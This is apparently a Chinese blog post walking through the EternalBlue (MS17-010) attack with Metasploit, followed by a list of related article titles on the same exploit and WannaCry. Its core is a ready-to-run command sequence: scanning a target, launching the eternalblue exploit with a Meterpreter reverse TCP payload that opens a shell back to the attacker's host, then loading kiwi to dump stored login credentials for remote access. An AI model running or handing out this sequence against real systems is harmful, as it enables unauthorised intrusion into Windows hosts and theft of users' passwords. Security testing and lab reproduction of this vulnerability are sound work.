MSF永恒之蓝使用

简介: MSF永恒之蓝使用

MSF永恒之蓝MS17-010


1. 扫描


use auxiliary/scanner/smb/smb_ms17_010(加载模块扫描exp)

set RHOSTS 192.168.167.60(设置被扫描ip)

run(开始扫描,查看是否存在)


检测到可以使用永恒之蓝


2.


use exploit/windows/smb/ms17_010_eternalblue(加载模块)

set RHOSTS 192.168.167.60(IP)

set LHOST 192.168.167.48 (设置本机IP)

set LPORT 4444 (设置连接端口)

set payload windows/x64/meterpreter/reverse_tcp (设置payload) run (开始)

显示IP+端口>>>目标IP+端口(反弹成功)


shell(拿到权限)


3. 获取登录用户名密码


meterpreter > load kiwi

meterpreter > creds_msv

meterpreter > creds_wdigest


拿到登录密码


4. 下面就可以远程登录目标主机了

目录
相关文章
|
4月前
|
安全 网络协议 Shell
永恒之蓝(MS17-010)漏洞利用
永恒之蓝(MS17-010)漏洞利用
300 1
|
11月前
|
监控 安全 测试技术
ms17-010(永恒之蓝)漏洞复现
ms17-010(永恒之蓝)利用的端口是445端口。 本文主要讲解ms17-010(永恒之蓝)漏洞复现,分为四个部分:了解渗透测试流程,使用nmap工具对win7进行扫描,尝试ms17-010漏洞利用,结果展示。第一部分“了解渗透测试流程”可以略过,可以直接从第二部分“使用nmap工具对win7进行扫描”开始看起。
648 5
ms17-010(永恒之蓝)漏洞复现
|
9月前
|
安全 网络安全 Windows
CVE-2017-0143永恒之蓝复现
CVE-2017-0143永恒之蓝复现
95 0
|
10月前
|
安全 开发工具 git
win10永恒之黑漏洞复现
win10永恒之黑漏洞复现
99 0
|
10月前
|
安全 Shell Linux
kali (永恒之蓝MS17_010)漏洞复现
kali (永恒之蓝MS17_010)漏洞复现
185 0
|
11月前
|
安全 数据安全/隐私保护 Windows
“永恒之蓝”勒索病毒检测+恢复工具
预测第二波WannaCry勒索病毒攻击即将到来! NSA黑客武器库泄漏的“永恒之蓝”发起的病毒攻击事件。 解决方案:勒索蠕虫病毒文件恢复工具 检测工具下载
141 0
|
安全 网络协议 关系型数据库
永恒之蓝漏洞利用
永恒之蓝漏洞利用
183 0
|
安全 网络安全 API
MS17-010永恒之蓝漏洞的浅谈与利用
MS17-010永恒之蓝漏洞的浅谈与利用
431 0
|
安全 网络协议 网络安全
永恒之蓝Windows10版踩坑复现
永恒之蓝Windows10版踩坑复现
894 0
|
安全 Linux 区块链
勒索病毒WannaCry(永恒之蓝)
原创作品,允许转载,转载时请务必以超链接形式标明文章 原始出处 、作者信息和本声明。否则将追究法律责任。http://solin.blog.51cto.com/11319413/1925890 勒索病毒WannaCry(永恒之蓝)   日前,"永恒之蓝"席卷全球,已经有90个国家遭到***。
1966 0